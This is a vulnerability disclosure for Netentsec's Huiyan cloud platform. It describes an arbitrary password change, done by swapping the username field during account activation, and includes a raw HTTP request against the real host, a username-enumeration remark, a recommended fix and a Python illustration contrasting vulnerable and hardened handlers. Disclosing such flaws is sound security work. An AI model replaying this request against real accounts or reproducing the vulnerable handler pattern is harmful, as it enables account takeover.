Wangkang Technology (Netentsec) Huiyan cloud security platform: arbitrary password change vulnerability (official website account / Sina)
1. Register an account; an e-mail is sent to continue the registration.
2. Open the URL from the e-mail and set a password.
3. When submitting the password form, change the username field to another account. The modification succeeds and that account's password is changed.
POST /main/index/setpass HTTP/1.1
Host: yun.netentsec.com
Proxy-Connection: keep-alive
Content-Length: 113
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://yun.netentsec.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://yun.netentsec.com/main/index/activation?from=ACTIVE_BY_URL&action=activation&t=3dce3f511744e6dbc649912325b7a118
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:

username=36&email=aklf***%40163.com&pw=A******&newpw=A******&V1Nq0Lqkxqqgh6F=b05145d619fa53d0112583876eb93d76
The registration form also reveals whether a username already exists, which shows which vendors are using the platform (the ones found via WooYun).
Official website accounts: netentsec, sina
This figure is beautiful.
Solution:
Verify, on the server side, that the submitted username matches the account the activation link was issued for, and verify the activation token itself.
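As an added illustration (not code from this report or from Netentsec), the handler pattern behind this flaw next to a hardened version in Python; the in-memory account store, the account ids and the token value are constructed assumptions.

```python
import hmac

# Constructed stand-ins for the platform's database (assumption, not the real schema).
ACCOUNTS = {
    "36": {"email": "aklf***@163.com", "password": None},       # the account being activated
    "37": {"email": "victim@example.com", "password": "unchanged"},  # someone else's account
}
# Activation token -> account id, recorded when the activation e-mail was sent.
ACTIVATION_TOKENS = {"constructed-activation-token-0001": "36"}


def setpass_vulnerable(form):
    """Mirrors the reported flaw: the account to update is taken from the
    client-controlled 'username' field, so any account id can be substituted."""
    acct = ACCOUNTS.get(form.get("username", ""))
    if acct is None or form.get("pw") != form.get("newpw"):
        return False
    acct["password"] = form["pw"]
    return True


def setpass_fixed(form, token):
    """Hardened handler: the account is derived from the activation token on the
    server side, a submitted username must agree with it, and the token is
    consumed so the same link cannot be replayed."""
    account_id = ACTIVATION_TOKENS.get(token)
    if account_id is None:
        return False                       # unknown or already-used token
    # Compare in constant time; the client may not pick a different account.
    if not hmac.compare_digest(account_id, form.get("username", "")):
        return False
    if form.get("pw") != form.get("newpw") or not form.get("pw"):
        return False
    ACCOUNTS[account_id]["password"] = form["pw"]
    del ACTIVATION_TOKENS[token]           # single use
    return True
```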